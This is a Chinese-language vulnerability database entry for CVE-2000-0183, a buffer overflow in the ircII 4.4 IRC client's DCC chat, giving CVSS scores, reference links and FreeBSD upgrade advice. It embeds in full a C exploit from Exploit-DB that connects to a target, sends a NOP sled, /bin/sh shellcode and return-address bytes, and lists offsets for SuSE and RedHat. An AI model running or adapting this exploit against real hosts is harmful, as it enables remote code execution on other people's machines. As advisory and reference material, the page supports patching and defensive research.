CVE-2000-0183
CVSS5.1
发布时间 :2000-03-10 00:00:00
修订时间 :2008-09-10 15:03:15
NMCOE    

[原文]Buffer overflow in ircII 4.4 IRC client allows remote attackers to execute commands via the DCC chat capability.


[CNNVD]IrcII DCC Chat缓冲区溢出漏洞(CNNVD-200003-020)

        ircII 4.4版本IRC客户端存在缓冲区溢出漏洞。远程攻击者借助DCC聊天功能可以执行命令。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0183
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0183
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-020
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1046
(UNKNOWN)  BID  1046
http://www.redhat.com/support/errata/RHSA-2000-008.html
(UNKNOWN)  REDHAT  RHSA-2000:008
http://archives.neohapsis.com/archives/bugtraq/2000-03/0093.html
(UNKNOWN)  BUGTRAQ  20000310 Fwd: ircii-4.4 buffer overflow

- 漏洞信息

IrcII DCC Chat缓冲区溢出漏洞
中危 缓冲区溢出
2000-03-10 00:00:00 2005-05-02 00:00:00
远程※本地  
        ircII 4.4版本IRC客户端存在缓冲区溢出漏洞。远程攻击者借助DCC聊天功能可以执行命令。

- 公告与补丁

        bladi suggested upgrading to IrcII version 4.4M in his post to BugTraq on March 10, 2000.
        A fix was made available for the FreeBSD port of IrcII 4.4. From the advisory:
        1) Upgrade your entire ports collection and rebuild the ircII port.
        2) Reinstall a new package dated after the correction date, obtained from:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/ircII-4.4S.tgz
        3) download a new port skeleton for the ircII port from:
        http://www.freebsd.org/ports/
        and use it to rebuild the port.
        4) Use the portcheckout utility to automate option (3) above. The
        portcheckout port is available in /usr/ports/devel/portcheckout or the
        package can be obtained from:
        ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz
        Michael Sandrof IrcII 4.4 -7
        

- 漏洞信息 (19801)

Michael Sandrof IrcII 4.4 -7 Buffer Overflow Vulnerability (EDBID:19801)
linux remote
2000-03-10 Verified
0 bladi
N/A [点击下载]
source: http://www.securityfocus.com/bid/1046/info

IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a dcc chat. Exploitation this vulnerability could result in a remote compromise with the privileges of the user running the ircII client.

This vulnerability was present in the "port" made available with FreeBSD. It is not installed by default.


/*

  ircii-4.4 exploit by bladi & aLmUDeNa                        
                                                                                                                              
  buffer overflow in ircii dcc chat's                          
  allow to excute arbitrary                  
                                                               
  Affected:                                                    
           ircII-4.4                                           
                                                               
  Patch:                                                       
         Upgrade to ircII-4.4M                                 
  ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz    
                                                               
  Offset:                                                      
         SuSe 6.x :0xbfffe3ff                                  
         RedHat   :0xbfffe888
                                                               
  Thanks to : #warinhell,#hacker_novatos
  Special thanks go to: Topo[lb],
	Saludos para todos los que nos conozcan especialmente para eva ;)
                                         (bladi@euskalnet.net)  
*/

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

char *h_to_ip(char *hostname);
char *h_to_ip(char *hostname) {
  struct hostent *hozt;
  struct sockaddr_in tmp;
  struct in_addr in;
  if ((hozt=gethostbyname(hostname))==NULL)
      {
      printf(" ERROR: IP incorrecta\n");
      exit(0);                                     
      }
  memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);
  return(inet_ntoa(in));
}
main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  char *hostname;
  char nops[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char *shell =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int outsocket,tnt,i;
printf (" irciismash  ver: 1.0\n");
printf ("         by         \n");
printf ("  bladi & aLmUDeNa\n\n");

if (argc<3)
    {                        
    printf("Usage : %s hostname port\n",argv[0]);
    exit(-1);
    }
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n");
exit(0);
}
    printf("[1]- Noping\n    [");
    for(i=0;i<47;i++)
        {
        if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
        write(outsocket,nops,strlen(nops));
        }
    printf("]\n");
    printf("     Noped\n");
    printf("[2]- Injectin shellcode\n");
    write(outsocket,shell,strlen(shell));    
    usleep(999);
    printf("     Injected\n");
    printf("[3]- Waiting\n [");
    for(i=0;i<299;i++)
        {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket,"\xff",strlen("\xff"));
        write(outsocket,"\xbf",strlen("\xff"));
        write(outsocket,"\xff",strlen("\xe9"));
        write(outsocket,"\xe3",strlen("\xff"));
        }
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
}
		

- 漏洞信息

1252
ircII DCC Chat Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade, Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-02-07 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.4 M or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站